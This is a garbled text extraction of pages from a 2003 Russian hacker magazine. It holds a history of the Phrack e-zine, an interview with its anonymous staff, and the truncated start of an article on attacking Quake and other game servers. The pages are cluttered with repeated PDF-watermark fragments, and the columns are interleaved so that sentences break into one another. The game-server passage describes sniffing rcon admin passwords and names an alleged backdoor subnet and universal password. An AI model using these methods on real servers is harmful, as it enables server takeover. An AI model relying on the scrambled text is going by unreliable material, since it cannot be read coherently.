Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
20
Добавлен:
20.04.2024
Размер:
14.49 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

-

 

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

F

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

D

059>

 

 

 

 

o

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

r

 

 

 

 

 

BUY

NOW!

 

 

 

 

 

 

 

 

 

 

BUY

NOW!

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

o

 

 

 

w Click

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

.

 

 

 

 

 

 

 

 

.c

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

p

df

 

 

 

 

 

e

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

РОЖДЕНИЕ ИСТОРИИ

Летом 1987 г. волна преследований пронеслась

казывал взлома. И что он вообще не делал ниче-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

17 ноября 2002 года Phrack'у исполнилось 17

по миру компьютерного андеграунда, приостано-

го противозаконного, так как, в общем-то, не яв-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вив выпуск новых номеров Phrack'а на несколько

лялся хакером. Он просто публиковал журнал.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лет. За это время было выпущено 59 номеров,

месяцев. Чтобы избежать ареста и успешно за-

Knight Ligtning вышел из здания суда свободным

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сменилось более десяти редакторов. Журнал не-

кончить колледж, Knight Lightning и Taran King на

человеком, но ни он, ни Taran King больше никог-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

однократно пытались закрыть... тем не менее,

время покинули хакерское сообщество. Редакто-

да не были редакторами. В 1993 г., начиная с 42

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

после стольких испытаний он до сих пор жив.

ры журнала после этого несколько раз менялись:

номера, заведовавшего Phrack'ом Dispater'a сме-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Мало того, он вырос, стал намного объемнее и

сначала это был Elric Imrryr, затем Shooting

нил Erik Bloodaxe (Крис Гогганс) - один из изве-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

серьезнее, чем раньше.

Shark, чуть позже его сменил Crimson Death. В

стнейших хакеров компьютерного андеграунда.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Phrack не был первым. До него были и TAP, и

мае 1988 г. 20-й номер Phrack снова взяли в ру-

Эрик сразу же навел порядки в разваливающем-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2600, освещающие жизнь компьютерного/теле-

ки прежние редакторы и приступили к работе над

ся издании и первым делом написал уничтожаю-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

фонного андеграунда. Но сразу после его появ-

качеством статей и увеличением количества но-

щее вступление в адрес облажавшихся на суде

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ления стало ясно, что именно Phrack'у, благода-

востей в рубрике PWW. К этому времени журнал

агентов спецслужб и Bellsouth. Никогда до этого

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ря его доступности и открытости, суждено в бу-

уже успел заслужить репутацию серьезного тех-

не знавший слова "коммерция", Phrack внезапно

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дущем стать самым популярным хакерским жур-

нического издания. Его читали не только хакеры,

стал платным. Но платным только для корпора-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

налом. В ноябре 1985 г. Taran King (Рэнди Тиш-

но и администраторы правительственных сетей,

тивных и правительственных организаций. "Что-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лер) и Knight Lightning (Крэг Неидорф) еще не

а также сотрудники Секретных Служб США. В

бы все было по-честному, мы будем публиковать

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

знали, что дают рождение легенде...

конце 80-х известность чуть не обернулась для

информацию о финансовом положении журнала.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Первый номер нельзя было назвать идеальным.

Phrack'а гибелью.

 

Тогда все смогут посмотреть, чего стоит этика и

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Это была всего лишь кучка текстов, написанных

Подобно TAP'у, Phrack иногда публиковал техни-

борьба за авторское право антихакерских струк-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

заумно-техническим стилем и собранных в один

ческие документы, доступные ограниченному

тур", - добавил новый редактор. Следующий, 43

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

архив. К тому же вначале Phrack, помимо хакер-

числу лиц и распространяемые в закрытых сетях

номер стал самым объемным и информативным

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ской и фрикерской, имел анархистскую направ-

крупных компаний. В 1996 году хакер Prophet

за всю историю существования журнала. Во

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ленность и публиковал инструкции по сооруже-

взломал систему защиты компьютерной сети

вступлении Erik Bloodaxe сообщил, что только

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нию бомб и отпиранию замков. Но у него было

Bellsouth и скачал документ, описывающий спе-

два человека оплатили право читать журнал:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

одно неоспоримое достоинство - он был бес-

цификации телефонной службы "911". Три года

"CERT, BT Tymnet, SS... сотни организаций, рас-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

платным и публиковался в электронном виде, что

спустя он предложил Knight Lightning'у опублико-

суждающих об авторском праве, выслеживающих

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

давало всем желающим возможность его скачать.

вать этот текст, на что получил согласие. Мате-

'злостных хакеров' за его нарушение. И только

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Весть о новом издании быстро облетела весь ха-

риал под названием "Control Office Administration

представители двух компаний приобрели журнал

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

керский мир, что резко увеличило приток звонков

Of Enhanced 911 Services For Special Services And

легально. Спасибо за то, что вы наглядно показа-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

íà BBS "Metal Shop", "Elite" è "Kleptic Palace",

Major Account Centers" в сокращенном виде вы-

ли, как на самом деле к нам относитесь. Как

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

хранившие пилотный номер. Несмотря на скром-

шел в 24 номере Phrack'а... а еще год спустя ре-

плюете на наши права и труд".

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ность содержания, компьютерное сообщество

дактор журнала был арестован по обвинению в

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

поддержало начинание группы авторов и потре-

воровстве и разглашении конфиденциальной ин-

PHRACK: ÍÀØÈ ÄÍÈ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

бовало продолжения.

формации. Компания оценила стоимость доку-

С 51 по 56 номер редактирование и координа-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Через пару месяцев вышел второй номер. Теперь

мента "Е911" в 80 тысяч долларов. Knight

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Lightning'у, обвиняемому дополнительно во взло-

цию Phrack'а взял на себя Route, в прошлом из-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

в нем появилась новая рубрика, которая сразу же

ме компьютерных сетей, возглавлении небезыз-

вестный как Daemon8. А с 57 выпуска его

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

стала неотъемлемой частью издания и самой по-

вестной группы "Legion of Doom" и найме

 

сменила группа парней, именующих себя

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

пулярной среди читателей - Phrack World News.

Prophet'а для кражи у Bellsouth пресловутой ин-

просто Phrack Staff. О том, как обстоит дело

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

"Сценерам от сценеров" - так гласил девиз жур-

формации, грозило 30 лет тюрьмы. Секретные

Лого журнала "Phrack"

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нала, и хакеры со всего мира откликнулись на

Службы также требовали прикрыть журнал

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

него, присылая редакторам все известные им

Phrack. Но благодаря помощи друзей-хакеров ад-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

слухи и новости. В четвертом Phrack'e был опуб-

вокату удалось доказать суду, что "столь ценный"

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ликован первый профайл известного в середине

текстовый файл публично доступен в библиотеке

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

80-х фрикера Crimson Death. Позже биографиче-

штата и приобрести его может любой желающий

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ская информация стала появляться в журнале по-

всего за 13$. Доказали, что Крэг Неидорф не за-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

стоянно, рассказывая о самых достойных, об

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

элите компьютерного андеграунда.

За чтением Phrack'a на HAL2k1

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Седьмой номер вошел в историю. Именно в нем

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

впервые был опубликован легендарный хакерский

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

манифест, написанный The Mentor'ом. После это-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

го на электронный адрес журнала пришел шквал

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

отзывов. Манифест был принят и на протяжении

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нескольких лет оставался гордостью, гимном, вос-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

певающим идеологию и цели хакеров всего мира.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Столик Phrack Staff на HAL2001, куда

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

выгрузили журнал

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

5 Юниксоид 6 X-Стиль

7 Кодинг

8 Юниты

9 Quit>

 

 

 

 

 

59

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

P

 

 

 

 

 

 

 

 

i

 

 

 

 

D

 

 

<Page 060>

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

Взлом

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

PHRACK: ИСТОРИЯ О ЛЕГЕНДАРНОМ ЖУРНАЛЕ

mindw0rk (mindw0rk@mail.ru)

ХАКЕР\¹49\Январь\2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Печатный Phrack #57, представленный ñ

íà HAL2001

журналом сегодня, я попросил рассказать одного из членов группы:

mindw0rk: На страницах журнала я нигде не встречал ваших имен или псевдонимов. Можно узнать, кто скрывается за Phrack Staff?

Phrack Staff (PS): Люди, которые делают сей- час журнал, предпочитают сохранять инкогнито. mindw0rk: Как получилось, что вы взялись за издание Phrack'а?

PS: Однажды группа ребят, имеющая непосредственное отношение к миру компьютерной безопасности, оглянулась... И что же они увидели? А увидели они повальную распродажу, происходящую повсюду. На наших глазах люди, еще недавно бывшие элитой компьютерного андеграунда, бросали любимое занятие и устраивались на нудную работу, приносящую кучу денег. Крупнейший портал хакерских новостей (HNN) превратился в "Новости компьютерной

безопасности", контролируемые большой корпорацией. Мы не могли допустить, чтобы то же случилось с Phrack'ом, и через некоторое время после ухода Route, с его согласия, взяли журнал в свои руки. Приобрели домен Phrack.org, изменили дизайн старой паги (теперь все построено на SQL), пригласили ближайших друзей. Уже через пару недель у нас была готова первая статья. А новый, 57 Phrack, полностью сделанный нашей группой, был зарелизен через 10 месяцев, 11 августа 2001 г.

mindw0rk: Первые редакторы (Knight Lightning, Taran King, Crimson Death, Erik Bloodaxe) сейчас как-нибудь поддерживают журнал?

PS: Нет. Они работают в крупных компаниях, так что им не до Phrack'a.

mindw0rk: Где создается журнал? У вас есть свой офис или вся работа осуществляется на дому?

PS: У Phrack'а нет офиса. У Phrack'а никогда не будет офиса. Члены нашей редколлегии живут в

разных странах и работают, находясь в своих комнатах перед экраном домашнего компьютера. Это дает много преимуществ. При всем желании федералы не смогут нас прикрыть, пока не организуют масштабную операцию на всех континентах. Мы не знаем, что такое расходы на бумагу и аренду, мы не платим налогов. Создание журнала остается очень удобным и гибким, и благодаря электронному формату, мы имеем отличную обратную связь.

mindw0rk: Насколько Phrack изменился по сравнению с более ранними выпусками?

PS: Сегодня журнал читают намного больше людей. Мы уделяем внимание преимущественно технической и компьютерной области. Анархистские темы больше не появляются на страницах Phrack'а, как и политические воззвания. Благодаря широкому выбору, который мы имеем сейчас, статьи публикуются только самые лучшие и каче- ственные. Чаще всего их пишут известные в компьютерном мире люди.

 

 

 

 

Содержание Phrack #57

Журнал "2600".

 

Последний номер

 

 

 

 

 

 

 

1

 

2

 

3

 

4

 

60

 

Ньюсы

Феррум

Inside

PC_Zone

Взлом

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

F

 

 

 

 

 

 

t

 

<PageP

061>

 

 

 

i

 

D

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

mindw0rk: Сколько человек сейчас работает в

mindw0rk: Что еще, кроме вашего журнала, по-

mindw0rk: Phrack.org подвергался хакерским

коллективе Phrack Staff? Все ли они - хакеры?

советуешь почитать (имеются в виду ezin'ы)?

атакам? И как вы на это реагируете?

Какой ваш средний возраст? И сколько времени

PS: cDc zine, THC-mag, 9x, Faith, LOD technical

PS: Нас атакуют каждый день! Пару лет назад из-

требуется на издание журнала?

journal.

за этого был закрыт Phrack.com. Правда, на на-

PS: В нашей внутренней почтовой рассылке сей-

mindw0rk: Все статьи во Phrack'е - эксклюзивы,

шем сервере поживиться особо нечем - только

час 12 человек. Из них трое-четверо являются

или вы иногда перепечатываете интересные ма-

содержанием Phrack.org, которое и так все могут

ядром команды. Каждый из нас известен в ком-

териалы? Были ли коммерческие статьи, за кото-

просмотреть онлайн. Внутренняя рассылка, чер-

пьютерном сообществе и внес в его развитие

рые вы платили авторам деньги?

новики статей и остальные важные файлы недо-

определенный вклад. Средний возраст... хм, ду-

PS: Большинство материалов написано специ-

ступны через интернет. К взлому мы относимся

маю, около 23. Что касается времени - больше,

ально для Phrack'а, но в очень редких случаях

более или менее спокойно. Если человек осуще-

чем вы можете себе представить. Значительную

мы допускаем перепечатки (например, та же до-

ствляет серьезный хак в исследовательских це-

его часть занимает редактирование статей и ис-

кументация по Libnet от Route). Авторов мы не

лях, его не стоит преследовать и считать пре-

правление ошибок. К тому же, помимо самого

нанимаем и денег за статьи не платим.

ступником. Но если кто-то применяет ламерскую

журнала, нужно не забывать обновлять наши

mindw0rk: Какие программы используются для

псевдоатаку типа DDoS - мы иногда, когда есть

сайты, поддерживать сервер, проводить различ-

работы над журналом?

время, выслеживаем таких парней. Веселья ради.

ные акции. Как, например, выпуск футболок с

PS: Все делается под Unix'ом. Для набирания и

mindw0rk: Какие у вас отношения с организаци-

эмблемой Phrack'а или печатного варианта жур-

редактирования текстов используем редактор vi,

ями, предоставляющими услуги в сфере "Internet

íàëà.

aspell - для проверки ошибок, cvs - для того, что-

Security"? Читают ли вас федеральные структу-

mindw0rk: Phrack выходит в печатном виде?

бы над документом могли работать сразу не-

ры, и как вы с ними уживаетесь?

PS: Нерегулярно. И, конечно, не за деньги. Мы

сколько человек.

PS: У нас с ними сосуществование. Мы с ними не

привезли 500 номеров "Phrack #57" в твердой

mindw0rk: А куда делась рубрика "Pro-Phile"?

сотрудничаем, но и активно не воюем. Мне изве-

обложке на хакерскую конференцию HAL2001. Их

Она была одной из моих любимых в журнале!

стно, что на рассылку "уведомление о выходе но-

разобрали меньше чем за 5 минут :).

PS: Мы с удовольствием ее возобновим, как

вого Phrack'a" подписался один из крупнейших

mindw0rk: А как насчет коммерческого издания

только найдем достойного человека, о котором

полицейских департаментов страны. Просмотр

журнала в печатном виде? Ведь на этом можно

захотим рассказать. Хочется найти кого-то из но-

логов сервера Apache на предмет адресов

заработать неплохие деньги. И ваш труд будет

вых талантливых ребят, хватит уже про "старич-

*.gov/*.mil не оставляет сомнений, что эти ребята

оплачен...

ков" писать.

присматривают за нами.

PS: Скорее преисподняя замерзнет, чем ком-

mindw0rk: Неужели есть какие-то проблемы с

mindw0rk: Есть ли у Phrack'а враги? И кто его

пьютерному сообществу придется платить за

тем, чтобы найти этого достойного?

друзья?

Phrack. Наши усилия вознаграждаются удоволь-

PS: Вообще-то да :(.

PS: Наши друзья - хакерское сообщество. Наши

ствием, которое мы получаем от создания журна-

mindw0rk: А как насчет материалов о кардинге

враги - те, кто нас предает. Мы строго следуем

ëà.

и информации, которая может явно навредить

своему обязательству и никогда не наносим удар

mindw0rk: Phrack с самого 1985 года выходит в

другим? Какова политика журнала относительно

первыми.

электронном виде в формате TXT, меняется

освещаемых тем?

mindw0rk: Ты наверняка неплохо ориентиру-

только содержание. Почему бы вам не написать

PS: Статью о кардинге мы публиковать не бу-

ешься в хакерском сообществе. Какая репутация

для него красивую мультимедийную оболочку, не

дем. Не потому, что это опасно, а потому, что

у русских хакеров? Твое мнение об уровне ком-

вставить музыку и качественные фотографии?

это ламерство. Мы пытаемся дать серьезные

пьютерных знаний в России.

Последовать примеру того же "Hugi"…

знания, а инструкции, как сгенерить номер и за-

PS: Русские хакеры известны тем, что о них ма-

PS: Чистое ASCII - все, что нам нужно для того,

казать на халяву комплектующие, можно найти

ло что известно :). Но те из них, кого знают в

чтобы донести миру информацию. Вместо под-

на любом кулхацкерском сайте. Впрочем, мы во-

мире компьютерной безопасности, имеют уро-

бора музыки и поиска фотографий, мы занима-

все не против опубликовать материал о защите

вень выше среднего. Сказать по правде... возь-

емся тем, что действительно имеет ценность -

кредитных карт или серьезную статью о взломе

ми 100 хакеров из США, и ты получишь 95 ламе-

публикуем хорошие статьи.

CC.

ров, возьми 100 хакеров из России, и все 100

mindw0rk: А какие материалы вызвали наиболь-

mindw0rk: Что нужно сделать, чтобы твоя ста-

будут действительно хакерами (хех, до чего на-

ший резонанс среди читателей?

тья была опубликована?

ивное мнение! - прим. mindw0rk).

PS: "Hacker's Manifesto" The Mentor'a (P07-03),

PS: Для начала почитать www.phrack.org/howto/

mindw0rk: Русские авторы пишут во Phrack?

"E911" Evasdropper'a (P24-05), "Smashing the

mindw0rk: Phrack - самый известный и попу-

PS: Да. Solar Designer, например. А также nergal

Stack For Fun And Profit" Aleph1'à (P49-14), "The

лярный электронный журнал на тему компьютер-

и другие.

Libnet Reference Manual" îò Route (P55-06) è

ной безопасности. Вам, наверное, приходит куча

mindw0rk: Ваши планы на будущее относитель-

"Advances of Format String Exploitation", подготов-

писем от поклонников? Что обычно люди пишут?

íî Phrack'a?

ленный gera и riq'ом (P59-07).

Можешь назвать самое забавное/тупое письмо,

PS: Продолжать бесплатно публиковать неза-

mindw0rk: Какие хакерские журналы вы бы на-

адресованное Phrack Staff?

висимый журнал о том, что интересно хакер-

звали своими основными конкурентами?

PS: Все тупые письма отправляются прямиком в

скому сообществу. Стараться, чтобы он и

PS: Мы ни с кем не соревнуемся. У нас очень

рубрику "Loopback" :). Обычно нам приходят от-

дальше оставался таким же интересным и ин-

хорошие отношения с редактором журнала

зывы об опубликованных материалах. Частенько

формативным.

"2600" Emmanuel'ем Goldstein'ом и мы только

получаем вопросы типа: "Как распаковать

mindw0rk: Спасибо за интервью.

рады, что кроме нас есть и другие интересные

tar.gz?", "Как открыть в моем Acrobat Reader'e

PS: Не за что. Читайте Phrack :).

издания.

.TXT?". Чаще всего мы их игнорируем.

 

Tips&Tricks

В теге <img alt=" "Вася Пупкин" - крутой чувак!!!" src="image.jpg"> невозможно взять текст в кавычки (если это сделать, текст обрывается на этой же самой кавычке). В этом случае можно поступить так: <img alt=" ''Вася Пупкин'' - крутой чувак!!!" src="image.jpg">, т. е. взять текст в апострофы, которые на

странице будут выглядеть точ- но так же, как кавычки!

2val2

2val2@bk.ru

Хочешь увидеть свои советы в журнале? Присылай их на адрес Sklyarov@real.xakep.ru. Ведущий рубрики Tips&Tricks Иван Скляров.

5 Юниксоид 6 X-Стиль 7 Кодинг 8 Юниты 9 Quit> 61

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

P

 

 

 

 

 

 

 

 

i

 

 

 

 

D

 

 

<Page 062>

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

Взлом

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

АТАКА ИГРОВЫХ СЕРВЕРОВ

CuTTer (cutter@real.xakep.ru)

ХАКЕР\¹49\Январь\2003

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

АТАКА

ИГРОВЫХ

СЕРВЕРОВ

ÈÃÐ

 

 

 

ПОПУЛЯРНЫХ

ИСПОЛЬЗУЙ

УЯЗВИМОСТИ

 

 

 

 

Хакер неоднократно публиковал статьи, посвященные безопасности различного ПО, описанию многих распространенных ошибок на сайтах. Мы писали про эксплоиты, необходимые для поднятия прав на серверах. Но никогда не было статей рассказывающих о глюках, присутствующих на игровых серверах. Ведь очень многие играют в Counter-Strike, люди до сих пор помнят о такой классике, как Q1, Q2, но мало кто знает, что все они подвержены атакам, приводящим к очень забавным результатам. Об этих самых забавных результатах и о том, как их получать, повествует наш материал.

 

Для удобства чтения я решил структуриро-

 

ной машине. Далее придется ставить снифер.

до больше. Это и бэкдор, оставленный разра-

 

 

вать статью следующим образом: вначале

 

Лучше всего подойдет ethereal, так как он пони-

ботчиками, позволяющий всем пользовате-

 

 

пойдет рассказ о каждой игре и об ее иг-

 

мает протокол Quake'а. Его придется настроить,

лям, имеющим IP из сети id'шников

 

 

ровом сервере в отдельности (quake 1-3,

 

чтобы он отфильтровал весь трафик, кроме UDP.

(192.246.40.0/24), делать с ку2-серверами

 

 

half-life, cs, unreal и др.), а в конце - об-

 

Также надо поставить фильтр, чтобы проходили

все, что душе угодно. Т.е. если пользователь

 

 

щие методы захвата, независимо от игры.

 

пакеты только со словами rcon. После чего сни-

из сети id коннектится, например, на

 

 

Главное, чтобы игровые сервера работали

 

фер запускается... Теперь стоит ожидать появле-

quake.ru, вводит универсальный пароль "tms",

 

 

через TCP/IP (неважно, tcp или udp). И на-

 

ния админа с последующими вводами ркона. Он

то он автоматически становится админом.

 

 

последок рассказать, как можно завали-

пришел и выполнил какие-то настройки (т.е. вы-

 

Правда, замечательно? Но и это еще не все.

 

 

вать сервера через распространенные DoS

 

полнил команду rcon). Ха! Теперь можно лезть в

После выкладывания всех сорсов второй ква-

 

 

